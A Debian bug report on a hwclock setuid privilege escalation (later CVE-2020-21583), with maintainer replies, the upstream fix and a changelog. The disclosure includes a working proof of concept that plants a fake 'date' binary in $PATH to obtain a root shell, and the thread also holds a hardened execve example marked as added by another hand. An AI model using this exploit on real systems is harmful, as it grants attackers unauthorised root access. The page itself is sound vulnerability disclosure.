CVE-2020-21583: #786804 - hwclock(8) SUID privilege escalation
An issue in hwclock.13-v2.27 allows attackers to gain escalated privileges or execute arbitrary commands via the path parameter when setting the date.
Debian Bug report logs - #786804
hwclock(8) SUID privilege escalation
Report forwarded to [email protected], Debian util-linux Maintainers [email protected]:
Bug#786804; Package util-linux. (Mon, 25 May 2015 18:27:06 GMT) (full text, mbox, link).
Acknowledgement sent to [email protected]:
New Bug report received and forwarded. Copy sent to Debian util-linux Maintainers [email protected]. (Mon, 25 May 2015 18:27:07 GMT) (full text, mbox, link).
Message #5 received at [email protected] (full text, mbox, reply):
Package: util-linux
Version: 2.26.2
Actually, all versions of util-linux are affected.
Hello, Federico Bento here.
During a recent assessment I have stumbled across a system which had
hwclock(8) setuid root
```
$ man hwclock | sed -n '223,231p'
Users access and setuid
    Sometimes, you need to install hwclock setuid root. If you want users other than the superuser to be able to display the clock value using the direct ISA I/O method, install it setuid root. If you have the /dev/rtc interface on your system or are on a non-ISA system, there’s probably no need for users to use the direct ISA I/O method, so don’t bother.

    In any case, hwclock will not allow you to set anything unless you have the superuser real uid. (This is restriction is not necessary if you haven’t installed setuid root, but it’s there for now).
```
http://sources.debian.net/src/util-linux/2.26.2-5/sys-utils/hwclock.c/#L2041
http://sources.debian.net/src/util-linux/2.26.2-5/sys-utils/hwclock.c/#L1920
“The program is designed to run setuid superuser, since we need to be able to do direct I/O. (More to the point: we need permission to execute the iopl() system call). (However, if you use one of the methods other than direct ISA I/O to access the clock, no setuid is required).”
"program is designed to run setuid (in some situations)"
from util-linux/2.26.2-5/sys-utils/hwclock.c http://sources.debian.net/src/util-linux/2.26.2-5/sys-utils/hwclock.c/#L748
```c
/* Quotes in date_opt would ruin the date command we construct. */
if (strchr(date_opt, '"') != NULL) {
	warnx(_("The value of the --date option is not a valid date.\n"
		"In particular, it contains quotation marks."));
	return 12;
}

sprintf(date_command, "date --date=\"%s\" +seconds-into-epoch=%%s",
	date_opt);
[...]
date_child_fp = popen(date_command, "r");
[...]
```
hwclock uses popen() to date_command which is ‘date --date=\"%s\"
+seconds-into-epoch=%%s’
Exploiting is trivial, since $PATH is user-controlled
```
$ ls -l /usr/sbin/hwclock
-rwsr-sr-x. 1 root root 48096 Nov 27 14:10 /usr/sbin/hwclock
$ cat > date.c;gcc date.c -o date
main() { chown("/tmp/sploit", 0, 0); chmod("/tmp/sploit", 04755); }
^D
$ cp /bin/sh /tmp/sploit
$ PATH=".:$PATH" /usr/sbin/hwclock --set --date="05/23/2015 20:35:37"
hwclock: The date command issued by hwclock returned unexpected results.
The command was:
  date --date="05/23/2015 20:35:37" +seconds-into-epoch=%s
The response was:

hwclock: No usable set-to time. Cannot set clock.
$ /tmp/sploit
id
euid=0(root) groups=0(root)
```
Notes:
Please note that this is possible on Debian-derived (and therefore
Ubuntu), because /bin/sh is provided by dash which does NOT make use
of privmode.
From Tavis Ormandy’s blog post:
```c
if (running_setuid && privileged_mode == 0)
  disable_priv_mode ();
```
Where disable_priv_mode () is defined as:
```c
void
disable_priv_mode ()
{
  setuid (current_user.uid);
  setgid (current_user.gid);
  current_user.euid = current_user.uid;
  current_user.egid = current_user.gid;
}
```
On most modern Linux systems, /bin/sh is provided by bash.
As everyone who works in security quickly learns, bash will drop
privileges very early if ruid != euid unless -p switch is used.
This is surprisingly effective at mitigating some common vulnerability
classes and misconfigurations, and it has been around since mid 90’s.
Indeed, Chet Ramey (bash author and maintainer) explains that the
purpose of this is to prevent “bogus system(3)/popen(3) calls in
setuid executables”
TL;DR: When setuid root, hwclock relies on $PATH to popen() the date
command, meaning privilege escalation can occur since $PATH is
user-controlled.
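A hardened way to make the same `date` call from a privileged program, added here as an illustration and not taken from util-linux or from its upstream fix: the helper is named by absolute path, run with `execve()` instead of `popen()` so no shell and no `$PATH` search is involved, handed a fixed environment, and stripped of setuid privilege before it starts. `run_clean`, `clean_env` and `DATE_PATH` are hypothetical names, and `/bin/date` is an assumed location.

```c
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Added example, not util-linux code. DATE_PATH is an assumed location. */
#define DATE_PATH "/bin/date"
/* Fixed environment for the child; nothing is inherited from the caller. */
static char *const clean_env[] = { "PATH=/usr/bin:/bin", "LC_ALL=C", NULL };

/* Run abs_path with argv and clean_env, capture stdout; returns exit status or -1. */
int run_clean(const char *abs_path, char *const argv[], char *out, size_t outlen)
{
	int fds[2], status;
	size_t used = 0;
	ssize_t n;
	pid_t pid;

	if (abs_path[0] != '/' || outlen == 0)	/* refuse names that need a search */
		return -1;
	if (pipe(fds) < 0)
		return -1;
	if ((pid = fork()) < 0) {
		close(fds[0]);
		close(fds[1]);
		return -1;
	}
	if (pid == 0) {
		/* Drop setuid/setgid privilege before exec: group first, then user. */
		if (setgid(getgid()) != 0 || setuid(getuid()) != 0)
			_exit(126);
		if (dup2(fds[1], STDOUT_FILENO) < 0)
			_exit(126);
		close(fds[0]);
		close(fds[1]);
		execve(abs_path, argv, clean_env);	/* no "sh -c", no PATH lookup */
		_exit(127);
	}
	close(fds[1]);
	while (used < outlen - 1 && (n = read(fds[0], out + used, outlen - 1 - used)) > 0)
		used += (size_t)n;
	out[used] = '\0';
	close(fds[0]);
	if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
		return -1;
	return WEXITSTATUS(status);
}

int main(void)
{
	/* hwclock's date call as an argv: the --date value is one element. */
	char *argv[] = { "date", "--date=05/23/2015 20:35:37",
			 "+seconds-into-epoch=%s", NULL };
	char buf[64];

	if (run_clean(DATE_PATH, argv, buf, sizeof(buf)) != 0)
		return 1;
	return fputs(buf, stdout) == EOF;
}
```

Because the date string travels as a single `argv` element, the quotation-mark check in the original code has nothing left to protect, and a caller-supplied `PATH` never reaches the helper.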
Information forwarded to [email protected], Debian util-linux Maintainers [email protected]:
Bug#786804; Package util-linux. (Tue, 26 May 2015 09:57:04 GMT) (full text, mbox, link).
Acknowledgement sent to Andreas Henriksson [email protected]:
Extra info received and forwarded to list. Copy sent to Debian util-linux Maintainers [email protected]. (Tue, 26 May 2015 09:57:04 GMT) (full text, mbox, link).
Message #10 received at [email protected] (full text, mbox, reply):
Control: tags -1 + upstream fixed-upstream
Control: forwarded -1 https://github.com/karelzak/util-linux/commit/687cc5d58942b24a9f4013c68876d8cbea907ab1
Hello Federico Bento!
Thanks for your detailed bug report.
On Mon, May 25, 2015 at 07:51:11PM +0200, [email protected] wrote:
> Package: util-linux
> Version: 2.26.2
>
> Actually, all versions of util-linux are affected.

Given that you didn’t specify a valid debian revision in the Version tag the bug tracking system is tracking it as affecting all versions. :)

[…]

> During a recent assessment I have stumbled across a system which had hwclock(8) setuid root

[…]

To clarify for the records, hwclock is *not* shipped suid in Debian so this does not affect normal installs. Only if the admin manually modified the system (based on incorrect information in the manpage).

[…]

> Exploiting is trivial, since $PATH is user-controlled

[…]

I’ve mentioned your bug report to upstream which quickly followed up with the following commit:
https://github.com/karelzak/util-linux/commit/687cc5d58942b24a9f4013c68876d8cbea907ab1
This will be part of future upstream v2.27 release (at least).
This should hopefully address your concerns. Please follow up if you spot any additional problems with the new upstream code and manpage instructions. For more direct interaction and less roundtrips feel free to contact upstream util-linux mailing list on vger.kernel.org directly.
Thanks again for your detailed bug report.
Regards, Andreas Henriksson
Added tag(s) upstream and fixed-upstream. Request was from Andreas Henriksson [email protected] to [email protected]. (Tue, 26 May 2015 09:57:05 GMT) (full text, mbox, link).
No longer marked as found in versions 2.26.2. Request was from Salvatore Bonaccorso [email protected] to [email protected]. (Tue, 26 May 2015 20:15:20 GMT) (full text, mbox, link).
Marked as found in versions util-linux/2.17.2-1. Request was from Salvatore Bonaccorso [email protected] to [email protected]. (Tue, 26 May 2015 20:15:21 GMT) (full text, mbox, link).
Reply sent to Andreas Henriksson [email protected]:
You have taken responsibility. (Fri, 31 Jul 2015 13:24:13 GMT) (full text, mbox, link).
Notification sent to [email protected]:
Bug acknowledged by developer. (Fri, 31 Jul 2015 13:24:13 GMT) (full text, mbox, link).
Message #23 received at [email protected] (full text, mbox, reply):
Source: util-linux
Source-Version: 2.27~rc1-1
We believe that the bug you reported is fixed in the latest version of util-linux, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is attached.
Thank you for reporting the bug, which will now be closed. If you have further comments please address them to [email protected], and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software pp. Andreas Henriksson [email protected] (supplier of updated util-linux package)
(This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing [email protected])
```
Format: 1.8
Date: Fri, 31 Jul 2015 14:45:54 +0200
Source: util-linux
Binary: util-linux util-linux-locales mount bsdutils fdisk-udeb libblkid1 libblkid1-udeb libblkid-dev libfdisk1 libfdisk1-udeb libfdisk-dev libmount1 libmount-dev libsmartcols1 libsmartcols1-udeb libsmartcols-dev libuuid1 uuid-runtime libuuid1-udeb uuid-dev util-linux-udeb
Architecture: source amd64 all
Version: 2.27~rc1-1
Distribution: experimental
Urgency: medium
Maintainer: Debian util-linux Maintainers [email protected]
Changed-By: Andreas Henriksson [email protected]
Description:
 bsdutils - basic utilities from 4.4BSD-Lite
 fdisk-udeb - Manually partition a hard drive (fdisk) (udeb)
 libblkid-dev - block device id library - headers and static libraries
 libblkid1 - block device id library
 libblkid1-udeb - stripped down block device id library, for debian-installer (udeb)
 libfdisk-dev - fdisk partitioning library - headers and static libraries
 libfdisk1 - fdisk partitioning library
 libfdisk1-udeb - stripped down fdisk partitioning library, for debian-installer (udeb)
 libmount-dev - device mounting library - headers and static libraries
 libmount1 - device mounting library
 libsmartcols-dev - smart column output alignment library - headers and static librar
 libsmartcols1 - smart column output alignment library
 libsmartcols1-udeb - stripped down smart column output aligment library, for debian-in (udeb)
 libuuid1 - Universally Unique ID library
 libuuid1-udeb - stripped down universally unique id library, for debian-installer (udeb)
 mount - Tools for mounting and manipulating filesystems
 util-linux - Miscellaneous system utilities
 util-linux-locales - Locales files for util-linux
 util-linux-udeb - stripped down miscellaneous system utilities, for debian-installe (udeb)
 uuid-dev - universally unique id library - headers and static libraries
 uuid-runtime - runtime components for the Universally Unique ID library
Closes: 786554 786759 786804 787763 789950 790875
Changes:
 util-linux (2.27~rc1-1) experimental; urgency=medium
 .
   * Imported Upstream version 2.27~rc1
     - among other things includes these fixes:
       mkfs: drop hardcoded search path (Closes: #786759)
       man: fix nolazytime typo in mount(8) (Closes: #786554)
       unshare: add --propagation, use MS_PRIVATE by default (Closes: #787763)
       hwclock: don’t allow non-root access (Closes: #786804)
       sulogin: improve support for locked root account (Closes: #789950)
       (Please note that --force option is needed for sulogin with locked root!)
       logger: do not exit when socket errors are not enforced (Closes: #790875)
   * Update patch queue for 2.27
     - dropped patches (now include in upstream release):
       0002-lib-fileutils-Add-new-dup_fd_cloexec-function.patch
       0003-lib-sysfs-Use-dup_fd_cloexec-instead-of-direct-call-.patch
   * Don’t use deprecated gbp commands in debian/README.source
   * Ship lslogins, lsipc and manpages in util-linux package
   * Update debian/*.symbols with newly added symbols
```
Bug archived. Request was from Debbugs Internal Request [email protected] to [email protected]. (Tue, 06 Oct 2015 07:25:48 GMT) (full text, mbox, link).
Debian bug tracking system administrator <[email protected]>. Last modified: Mon Aug 28 17:09:28 2023; Machine Name: buxtehude